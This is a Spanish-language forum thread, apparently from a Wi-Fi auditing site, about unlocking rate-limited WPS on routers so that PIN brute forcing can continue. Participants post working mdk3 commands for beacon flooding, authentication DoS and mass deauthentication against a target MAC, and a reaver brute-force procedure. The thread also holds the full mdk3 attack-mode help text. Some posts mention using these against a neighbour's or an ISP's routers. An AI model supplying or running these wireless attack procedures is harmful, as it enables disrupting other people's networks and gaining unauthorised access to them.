Board Stats

  • stats Total de Usuarios: 23359
  • stats Total de Mensajes: 108425
  • stats Total de Temas: 10436
  • stats Total de Categorías: 15
  • stats Total de Foros: 74
  • stats Máx. usuarios conectados (simultáneamente): 1021

Ultimo registro



Autor Tema: WPS unlock  (Leído 112208 veces)

0 Usuarios y 1 Visitante están viendo este tema.

donkey

  • Visitante
WPS unlock
« en: Diciembre 18, 2012, 12:51:42 pm »
admin or anybody. i am donkey hai hai hai  :D

some routers WPS locked.  how to unlock WPS router????

mdk3 is this posssible to for this WPS unlock ??? how to do this programme????

if anybody knows please give it to me the command line

Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 23158
  • Mari
    • WirelessWindows
Re:WPS unlock
« Respuesta #1 en: Diciembre 18, 2012, 13:12:36 pm »
Por favor trate de usar un traductor como hago yo, es un foro español y es posible que muchos usuarios no le entiendan.

No conozco ningún sistema para hacer lo que dices.

Please try to use a translator as I do, is a Spanish forum and many users may not understand.

I know of no system to do what you say.
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

betis-jesus

  • Visitante
Re:WPS unlock
« Respuesta #2 en: Diciembre 18, 2012, 13:38:42 pm »
Esta pidiendo si hay una manera de desbloquear un router wps que ya esta bloqueado y como desbloquearlo usando el programa mdk3 pidiendo cual es la sistexi que deber de envíale desde la línea de comando con mdk3

Teóricamente si es posible desbloquear un router wps que ya esta bloqueado si el router tiene activado el modo Plug-and-play o PnP usando el bug que tiene alguno router, pero desconozco que con el programa mdk3 tenga esa característica de desbloquear un router wps desde su línea de  comando nunca es usado ese programa

kcdtv

  • Visitante
Re:WPS unlock
« Respuesta #3 en: Diciembre 18, 2012, 14:03:29 pm »
Te recomiendo respecto a mdk3
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Esta en ingles y muy bien hecho

Hizo pruebas sobre una livebox 2 de la sagem y no hubo resultado respecto a desbloquear el WPS o forzar el reinicio de la box.
Ahora cada routeur es una historia  ;) 

Citar
Plug-and-play o PnP usando el bug que tiene alguno router

No se a que te refieres exactamente pero no me parece que sea algo que haga mdk3 en todo caso.

donkey

  • Visitante
Re:WPS unlock
« Respuesta #4 en: Diciembre 18, 2012, 16:50:39 pm »
thanks all & kcdtv your link helpful   ;D

many thanks


Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 23158
  • Mari
    • WirelessWindows
Re:WPS unlock
« Respuesta #5 en: Diciembre 18, 2012, 22:16:20 pm »

Se lo que pregunta betis-jesus.. lo que le digo es que escriba mediante un traductor (o como hago yo en los dos idiomas)
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

betis-jesus

  • Visitante
Re:WPS unlock
« Respuesta #6 en: Diciembre 18, 2012, 23:35:21 pm »
Ok entendido maripuri

Antiguamente se descubrió que se podría tener acceso a un router que tuviera Plug-and-play o PnP y modificar la configuración de router sin necesida de calve administrativa o de acceso gracia a la pecualiridad que tiene los dispositivo PnP en comunicarse entre si

fuer muy explotado este tipo de vulnaridades en alguno router todavía los tiene aunque no es muy habitual hoy en dia, se  empleaba muchos en los circulo de hacker para modificar los router aunque es que quisiera aprovecha esta vulganaridades debía tener mas conocimiento ya que no podría hacerlo un cualquiera.

Desconectado rcoto

  • Usuario
  • *
  • Mensajes: 212
Re:WPS unlock
« Respuesta #7 en: Diciembre 19, 2012, 12:20:09 pm »
Te recomiendo respecto a mdk3
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Esta en ingles y muy bien hecho

Hizo pruebas sobre una livebox 2 de la sagem y no hubo resultado respecto a desbloquear el WPS o forzar el reinicio de la box.
Ahora cada routeur es una historia  ;) 

No se a que te refieres exactamente pero no me parece que sea algo que haga mdk3 en todo caso.
la verdad que echo este procedimiento y me ha funcionado me quita el locked, lo que pasa que nada mas que le pase el reaver luego me blooquea otra vez el router y me pone otra vez si locked

kcdtv

  • Visitante
Re:WPS unlock
« Respuesta #8 en: Diciembre 19, 2012, 13:44:13 pm »
¿Que procedimiento? ¿Que ataque empleaste?

Desconectado rcoto

  • Usuario
  • *
  • Mensajes: 212
Re:WPS unlock
« Respuesta #9 en: Diciembre 19, 2012, 14:27:36 pm »
mdk3 mon0 b -n DEFAULT -w -g -m -s 50           
mdk3 mon0 a -a xx:xx:xx:xx:xx:xx -m   
echo xx:xx:xx:xx:xx:xx > mdk3test.txt
mdk3 mon0 d -b mdk3test.txt -c 1 -s 250


kcdtv

  • Visitante
Re:WPS unlock
« Respuesta #10 en: Diciembre 19, 2012, 15:08:21 pm »
o sea todo a la vez mas o menos  ;D
Y con esto ¿que has conseguido exactamente?
¿Cuanto tiempo has tenido que dejar correr el ataque para obtener el resultado (y cual es exactamente)?
respecto a que se te vuelva a poner el bloqueo wps después que lo hayas levantado era un poco de esperar.  :-\
En todo casos es muy interesante  ;)

Veo que redactas un ficehro .txt, ¿Porque?
Código: [Seleccionar]
echo xx:xx:xx:xx:xx:xx > mdk3test.txt
« Última modificación: Diciembre 19, 2012, 17:37:38 pm por kcdtv »

Desconectado 8carlos88

  • Colaborador
  • Usuario
  • *****
  • Mensajes: 218
Re:WPS unlock
« Respuesta #11 en: Diciembre 19, 2012, 16:23:21 pm »
hola esto se podria usar para router de vodafone q estan bloqueados, desbloquearlos y luego con el jumpstar meterle el pin y conectarse?

un saludo

kcdtv

  • Visitante
Re:WPS unlock
« Respuesta #12 en: Diciembre 19, 2012, 16:35:31 pm »
Con un wpa downgrade o un attaque Amok mode todo se basa en el hecho de que el usuario intervenga y decide reiniciar su routeur porque no se puede conectar (o lo pase en WEP porque no se puede conectar en WPA en el caso del WPA downgrade).
puedes hacer lo mismo con aireplay-ng, no parrar de deasauthenticar esperando que el usuario reincie su box por no poder conectarse.
es una technica no muy viable como ves.
Lo que sería interesante es encontrar el medio de provocar un desbloqueo mecánico, si rcoto ha usado todos estos comandos es que la parte interesante que sería flood no le ha bastado y ha usado los demás ataques, es como hacer una "megadesauthetificación", falta airebase-ng y dos o tres cosas mas para que todo el vecindario tenga problemas para conectarse  ;D

Código: [Seleccionar]
sudo mdk3 --help

MDK 3.0 v6 - "Yeah, well, whatever"
by ASPj of k2wrlz, using the osdep library from aircrack-ng
And with lots of help from the great aircrack-ng community:
Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape,
telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik
THANK YOU!

MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.
IMPORTANT: It is your responsibility to make sure you have permission from the
network owner before running MDK against it.

This code is licenced under the GPLv2

MDK USAGE:
mdk3 <interface> <test_mode> [test_options]

Try mdk3 --fullhelp for all test options
Try mdk3 --help <test_mode> for info about one test only

TEST MODES:
b   - Beacon Flood Mode
      Sends beacon frames to show fake APs at clients.
      This can sometimes crash network scanners and even drivers!
a   - Authentication DoS mode
      Sends authentication frames to all APs found in range.
      Too much clients freeze or reset some APs.
p   - Basic probing and ESSID Bruteforce mode
      Probes AP and check for answer, useful for checking if SSID has
      been correctly decloaked or if AP is in your adaptors sending range
      SSID Bruteforcing is also possible with this test mode.
d   - Deauthentication / Disassociation Amok Mode
      Kicks everybody found from AP
m   - Michael shutdown exploitation (TKIP)
      Cancels all traffic continuously
x   - 802.1X tests
w   - WIDS/WIPS Confusion
      Confuse/Abuse Intrusion Detection and Prevention Systems
f   - MAC filter bruteforce mode
      This test uses a list of known client MAC Adresses and tries to
      authenticate them to the given AP while dynamically changing
      its response timeout for best performance. It currently works only
      on APs who deny an open authentication request properly
g   - WPA Downgrade test
      deauthenticates Stations and APs sending WPA encrypted packets.
      With this test you can check if the sysadmin will try setting his
      network to WEP or disable encryption.
kcdtv@Nosystem:~$ sudo mdk3 --fullhelp

MDK 3.0 v6 - "Yeah, well, whatever"
by ASPj of k2wrlz, using the osdep library from aircrack-ng
And with lots of help from the great aircrack-ng community:
Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape,
telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik
THANK YOU!

MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.
IMPORTANT: It is your responsibility to make sure you have permission from the
network owner before running MDK against it.

This code is licenced under the GPLv2

MDK USAGE:
mdk3 <interface> <test_mode> [test_options]

Try mdk3 --fullhelp for all test options
Try mdk3 --help <test_mode> for info about one test only

TEST MODES:
b   - Beacon Flood Mode
      Sends beacon frames to show fake APs at clients.
      This can sometimes crash network scanners and even drivers!
a   - Authentication DoS mode
      Sends authentication frames to all APs found in range.
      Too much clients freeze or reset some APs.
p   - Basic probing and ESSID Bruteforce mode
      Probes AP and check for answer, useful for checking if SSID has
      been correctly decloaked or if AP is in your adaptors sending range
      SSID Bruteforcing is also possible with this test mode.
d   - Deauthentication / Disassociation Amok Mode
      Kicks everybody found from AP
m   - Michael shutdown exploitation (TKIP)
      Cancels all traffic continuously
x   - 802.1X tests
w   - WIDS/WIPS Confusion
      Confuse/Abuse Intrusion Detection and Prevention Systems
f   - MAC filter bruteforce mode
      This test uses a list of known client MAC Adresses and tries to
      authenticate them to the given AP while dynamically changing
      its response timeout for best performance. It currently works only
      on APs who deny an open authentication request properly
g   - WPA Downgrade test
      deauthenticates Stations and APs sending WPA encrypted packets.
      With this test you can check if the sysadmin will try setting his
      network to WEP or disable encryption.


b   - Beacon Flood Mode
      Sends beacon frames to show fake APs at clients.
      This can sometimes crash network scanners and even drivers!
      OPTIONS:
      -n <ssid>
         Use SSID <ssid> instead of randomly generated ones
      -f <filename>
         Read SSIDs from file
      -v <filename>
         Read MACs and SSIDs from file. See example file!
      -d
         Show station as Ad-Hoc
      -w
         Set WEP bit (Generates encrypted networks)
      -g
         Show station as 54 Mbit
      -t
         Show station using WPA TKIP encryption
      -a
         Show station using WPA AES encryption
      -m
         Use valid accesspoint MAC from OUI database
      -h
         Hop to channel where AP is spoofed
         This makes the test more effective against some devices/drivers
         But it reduces packet rate due to channel hopping.
      -c <chan>
         Fake an AP on channel <chan>. If you want your card to hop on
         this channel, you have to set -h option, too!
      -s <pps>
         Set speed in packets per second (Default: 50)
a   - Authentication DoS mode
      Sends authentication frames to all APs found in range.
      Too much clients freeze or reset almost every AP.
      OPTIONS:
      -a <ap_mac>
         Only test the specified AP
      -m
         Use valid client MAC from OUI database
      -c
         Do NOT check for test being successful
      -i <ap_mac>
         Perform intelligent test on AP (-a and -c will be ignored)
         This test connects clients to the AP and reinjects sniffed data to keep them alive
      -s <pps>
         Set speed in packets per second (Default: unlimited)
p   - Basic probing and ESSID Bruteforce mode
      Probes AP and check for answer, useful for checking if SSID has
      been correctly decloaked or if AP is in your adaptors sending range
      Use -f and -t option to enable SSID Bruteforcing.
      OPTIONS:
      -e <ssid>
         Tell mdk3 which SSID to probe for
      -f <filename>
         Read lines from file for bruteforcing hidden SSIDs
      -t <bssid>
         Set MAC adress of target AP
      -s <pps>
         Set speed (Default: unlimited, in Bruteforce mode: 300)
      -b <character set>
         Use full Bruteforce mode (recommended for short SSIDs only!)
         Use this switch only to show its help screen.
d   - Deauthentication / Disassociation Amok Mode
      Kicks everybody found from AP
      OPTIONS:
      -w <filename>
         Read file containing MACs not to care about (Whitelist mode)
      -b <filename>
         Read file containing MACs to run test on (Blacklist Mode)
      -s <pps>
         Set speed in packets per second (Default: unlimited)
      -c [chan,chan,chan,...]
         Enable channel hopping. Without providing any channels, mdk3 will hop an all
         14 b/g channels. Channel will be changed every 5 seconds.
m   - Michael shutdown exploitation (TKIP)
      Cancels all traffic continuously
      -t <bssid>
         Set Mac address of target AP
      -w <seconds>
         Seconds between bursts (Default: 10)
      -n <ppb>
         Set packets per burst (Default: 70)
      -j
         Use the new TKIP QoS-Exploit
         Needs just a few packets to shut AP down!
      -s <pps>
         Set speed (Default: 400)
x   - 802.1X tests
      0 - EAPOL Start packet flooding
            -n <ssid>
               Use SSID <ssid>
            -t <bssid>
               Set MAC address of target AP
            -w <WPA type>
               Set WPA type (1: WPA, 2: WPA2/RSN; default: WPA)
            -u <unicast cipher>
               Set unicast cipher type (1: TKIP, 2: CCMP; default: TKIP)
            -m <multicast cipher>
               Set multicast cipher type (1: TKIP, 2: CCMP; default: TKIP)
            -s <pps>
               Set speed (Default: 400)
      1 - EAPOL Logoff test
            -t <bssid>
               Set MAC address of target AP
            -c <bssid>
               Set MAC address of target STA
            -s <pps>
               Set speed (Default: 400)
w   - WIDS/WIPS/WDS Confusion
      Confuses a WDS with multi-authenticated clients which messes up routing tables
      -e <SSID>
         SSID of target WDS network
      -c [chan,chan,chan...]
         Use channel hopping
      -z
         activate Zero_Chaos' WIDS exploit
         (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
f   - MAC filter bruteforce mode
      This test uses a list of known client MAC Adresses and tries to
      authenticate them to the given AP while dynamically changing
      its response timeout for best performance. It currently works only
      on APs who deny an open authentication request properly
      -t <bssid>
         Target BSSID
      -m <mac>
         Set the MAC adress range to use (3 bytes, i.e. 00:12:34)
         Without -m, the internal database will be used
      -f <mac>
         Set the MAC adress to begin bruteforcing with
         (Note: You can't use -f and -m at the same time)
g   - WPA Downgrade test
      deauthenticates Stations and APs sending WPA encrypted packets.
      With this test you can check if the sysadmin will try setting his
      network to WEP or disable encryption. mdk3 will let WEP and unencrypted
      clients work, so if the sysadmin simply thinks "WPA is broken" he
      sure isn't the right one for this job.
      (this can/should be combined with social engineering)
      -t <bssid>
         Target network
« Última modificación: Diciembre 19, 2012, 19:19:20 pm por maripuri »

Desconectado rcoto

  • Usuario
  • *
  • Mensajes: 212
Re:WPS unlock
« Respuesta #13 en: Diciembre 19, 2012, 17:59:38 pm »
sigo en pruebas esto me ha funcionado con un router tp-link, y me ha funcionado pero bajo Linux, porque luego lo e intentado con Jumpstart y me dice que setup locked, e probado con otro router de orange un zcom. pero no hay manera. respecto al tiempo con solo 62 paquetes me ha servido ni 5 minutos. pero si te digo q cuando luego me ido al reaver se me queda en 91% y no se si será pq el pin que le meto no es.

kcdtv

  • Visitante
Re:WPS unlock
« Respuesta #14 en: Diciembre 19, 2012, 19:02:59 pm »
Cada routeur es una hsitoria rcoto, más si haces pruebas con tools de intrusión.
Estas malditas box de orange, livebox, cual sea el fabricante son robustas.
Hay que decir que al nivel del WPS anticiparon muy bien lo que se avecinaba,
No como otros  ;D
Pero vamos que desbloquear el rate limit de TP-LINK es ya una muy buena cosa  ;)

Lo que es importante en mi opinión ,cuando puedas y si te apetece y tienes tiempo, para que podamos ver claro y ver como podríamos integar, optimizar el attaque sería lo siguiente:

1 > Tener el TP_link con nigun cliente wireless conectado

2 > atacar con reaver en modo normal y sencillo
Código: [Seleccionar]
reaver -i mon0 -b mac_ojectivo -vv
Cuando se bloquea ejecutas solo el flood
Código: [Seleccionar]
mdk3 mon0 a -a xx:xx:xx:xx:xx:xx -m
prueba si tienes dos adaptores de attacar con dos a la vez a ver si no se acorta el tiempo de espera.
prueba con o sin el mickael shutdown (-m)

toma tu tiempo, que sea cuando sea, es importante que tengas las menos interferencias posibles, es decir nadie conectado al objectivo y lo ideal es que no haya mucho trafico.
A estas horas no es muy bueno por ejemplo.

 Esto en un primer tiempo si te apetece si así no funciona a ver que pasa sofisticando el ataque.
 Que te funcione tal cual lo tienes escrito solo con TP-Link no importa, lo primero es mirar lo que tienes entre mano, una vez que entendemos mejor lo que sucede, la impotencia de cada factor, etc.... seremos mas capaces de de jugar con las opciones mdk3 para adaptarse según los routeurs.
Lo importante es partir de algo para hacer cosas con criterio.
El hecho de que te salga con un routeur nos da una psita y medios para hacer algo de pruebas.
A ver si...  ;D


Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 23158
  • Mari
    • WirelessWindows
Re:WPS unlock
« Respuesta #15 en: Diciembre 19, 2012, 19:22:13 pm »

A mi me da que esto es mas o menos un DDos, sin menos que mas..
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

Desconectado kurgy

  • Colaborador
  • Usuario
  • *****
  • Mensajes: 726
Re:WPS unlock
« Respuesta #16 en: Diciembre 20, 2012, 02:03:16 am »
hombre si la idea es fastidiar la conexión del vecino hasta que reinicie el router, pues si hay métodos que funcionan, pero tampoco es plan de hacerlo...

kcdtv

  • Visitante
Re:WPS unlock
« Respuesta #17 en: Diciembre 20, 2012, 15:34:53 pm »
A mi me da que esto es mas o menos un DDos, sin menos que mas..

No maripuri, es distinto. Con DDoS (Denial of service), impides la conexión entre cliente y routeur (le niegas el servicio)
El ataque que interesa es justamente interesante por no ser de este palo

Citar
mdk3 mon0 a -a xx:xx:xx:xx:xx:xx -m 

Con esto inundes el routeur de clientes lo que teóricamente podría hacer que el routeur se resetea.
Se trata de desbloquear mecánicamente el bloqueo, lo demás no es ni una novedad ni interesante.
A mi nunca me hizo nada, lo puedo tener tirando y seguir conectado con mi otra interfaz...
pero cada routeur es una historia y puede ser que los tp-link racionen a este ataque, por esto me gustaría que el compi pruebas solo esta linea, para ver si hay algo que investigar o no.

Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 23158
  • Mari
    • WirelessWindows
Re:WPS unlock
« Respuesta #18 en: Diciembre 20, 2012, 17:14:31 pm »

Visto..  y comprendida la diferencia, gracias.
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

Desconectado rcoto

  • Usuario
  • *
  • Mensajes: 212
Re:WPS unlock
« Respuesta #19 en: Diciembre 23, 2012, 22:25:09 pm »
Cada routeur es una hsitoria rcoto, más si haces pruebas con tools de intrusión.
Estas malditas box de orange, livebox, cual sea el fabricante son robustas.
Hay que decir que al nivel del WPS anticiparon muy bien lo que se avecinaba,
No como otros  ;D
Pero vamos que desbloquear el rate limit de TP-LINK es ya una muy buena cosa  ;)

Lo que es importante en mi opinión ,cuando puedas y si te apetece y tienes tiempo, para que podamos ver claro y ver como podríamos integar, optimizar el attaque sería lo siguiente:

1 > Tener el TP_link con nigun cliente wireless conectado

2 > atacar con reaver en modo normal y sencillo
Código: [Seleccionar]
reaver -i mon0 -b mac_ojectivo -vv
Cuando se bloquea ejecutas solo el flood
Código: [Seleccionar]
mdk3 mon0 a -a xx:xx:xx:xx:xx:xx -m
prueba si tienes dos adaptores de attacar con dos a la vez a ver si no se acorta el tiempo de espera.
prueba con o sin el mickael shutdown (-m)

toma tu tiempo, que sea cuando sea, es importante que tengas las menos interferencias posibles, es decir nadie conectado al objectivo y lo ideal es que no haya mucho trafico.
A estas horas no es muy bueno por ejemplo.

 Esto en un primer tiempo si te apetece si así no funciona a ver que pasa sofisticando el ataque.
 Que te funcione tal cual lo tienes escrito solo con TP-Link no importa, lo primero es mirar lo que tienes entre mano, una vez que entendemos mejor lo que sucede, la impotencia de cada factor, etc.... seremos mas capaces de de jugar con las opciones mdk3 para adaptarse según los routeurs.
Lo importante es partir de algo para hacer cosas con criterio.
El hecho de que te salga con un routeur nos da una psita y medios para hacer algo de pruebas.
A ver si...  ;D
añado dos cositas mas
mdk3 mon0 b -f /root/swireless/wordlist/
mdk3 mon0 b -f mdk3test.txt -g -a -c 11
e ejecutado el ataque con dos adaptadores, e seguido tu pasos y lo mas bonito ahora es que ya no lo puedo desbloquear, es mas e probado también con otro router igual y este desde un principio no me dejaba quitar el locked, en fin ejecutando esto que he pueto me hace, que me aparezca una nueva red de icognita no se para que y empieza a salirme letras y códigos de todas las mac que va recibiendo algo muy extraño como si empezara a ir generando los cifrados de cada mac, cosa q es imposible por los símbolos raros q salen en fin ay lo dejo. y feliz navidad.



kcdtv

  • Visitante
Re:WPS unlock
« Respuesta #20 en: Diciembre 29, 2012, 05:26:27 am »
Lo que sale son falsos y se usan todo tipo de caracteres ascii parta saturtar el routeuir.
Es mejor si haces copiados pegados de lo que pasa en consola para que podamos ver que pasa (o captura de pantalla)
Parece que el attaque es inefectivo como lo es sobre el livebox pocos routeurs tienen que ser sensibles a tal ataque.
No has "desbloqueado" el routeur sino has hecho que el propietario del routeur reinicie el routeur lo que ha provocado el desbloqueo  es algo diferente y no es viable  :-\
« Última modificación: Diciembre 29, 2012, 05:29:25 am por kcdtv »

Desconectado haroll

  • Usuario
  • *
  • Mensajes: 151
Re:WPS unlock
« Respuesta #21 en: Marzo 13, 2013, 18:00:00 pm »
Vale,gracias,me he confundido con lo de fuerza bruta jejeje.solo expongo una idea,aver si entre todos podemos sacar algo.Ya he leido algo de sobrecargarlos de clientes,un ataque Ddos,no se algo que pueda resultar para que se reinicie.

Desconectado Coeman76

  • Colaborador
  • Usuario
  • *****
  • Mensajes: 1724
  • Wifiiu fiuuuu!!!
Re:WPS unlock
« Respuesta #22 en: Marzo 13, 2013, 18:11:34 pm »
....y sigues confundido....ya que el ddos o denegacion de servicio...no reinicia el router...como bien dice el nombre,denega el servicio al cliente y por lo tanto tiene que reiniciar el router para tener acceso....no se reinicia solo....por lo tanto no es viable.

un saludo
NO ATIENDO M.P. PIDIENDO ATENCION PERSONALIZADA... SI TIENES UNA DUDA PREGUNTALA EN EL FORO.

kcdtv

  • Visitante
Re:WPS unlock
« Respuesta #23 en: Marzo 13, 2013, 18:29:54 pm »
DoS = Denial of sertvice, (Denegación de servicio) es le mismo ataque que el "desauthentification" (A0) de aircracj-ng,
Nunca se ha tratado de resetar un routeur sino de desconectar clientes del punto de acceso.
A lo mejor un usuario excedido por no poder conectarse bien reinicia su routeur una vez... lo que no cambiara nada porque tendría que hacer un reset a nivel de fabrica para que este en Open,
El routeur se reinicia con los últimos settings en vigor, es decir con su llave configurada.
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

 
  Luego mdk3 tiene cómo opción el "Authentication DoS mode", repito lo que he escrito más arriba, llamar lo DoS es un abuso de lenguaje, digamos para ser preciso que usa paquetes de authentificación a piñon con la meta de que este uso a piñón provoque el efecto contrario, desauthentifica a los clientes y podría saturar unos routeurs que se congelan y algunos podrían hasta hacerlos reiniciarse (pero en ninguno caso hablamos de un reset a nivel de fabrica)
  Este attaque en si esta totalmente desfasado, valdría con viejos routeurs sin aguante pero los routeurs de hoy en día no se ven afectados lo más mínimo por este methodo.
  Si buscas en el foro de aircrack-ng tienes el autor de este tool quien es mod y quien ha hecho un interesante topic en 2012 sobre su tool  dónde explica porque este ataque es inviable hoy en día, ninguna tarjeta tiene capacidad para saturar asi los routeurs de hoy mucho mas robustos que los de antes, hace mucho años antes...

- edit; Coeman ha sido más rapido  :P

- edit 2: Para que quede claro:  el DoS es el denial of Service que podemos hacer con aircrack-ng y mdk3 mediante aire
                                                el DDoS es el disitributed denial of service, es decir que implica la utilización de varios puntos de conexión para generar un gran flujo que satura y tumba los objetivos. Es la típica ataque tipo anonymous: montón de gente se conectan al mismo momento para usar LoiC y saturar desde miles de puntos diferentes los servidores de las web victimas.

DoS y DDoS son dos  :P cosas diferentes
« Última modificación: Marzo 13, 2013, 18:43:32 pm por kcdtv »

Desconectado alfon6

  • Usuario
  • *
  • Mensajes: 58
Re:WPS unlock
« Respuesta #24 en: Marzo 13, 2013, 18:54:18 pm »
Es lo mismo WPS bloqueado que desconectado?? Si alguien ha desconectado el WPS PIN con esto se puede volver a conectar??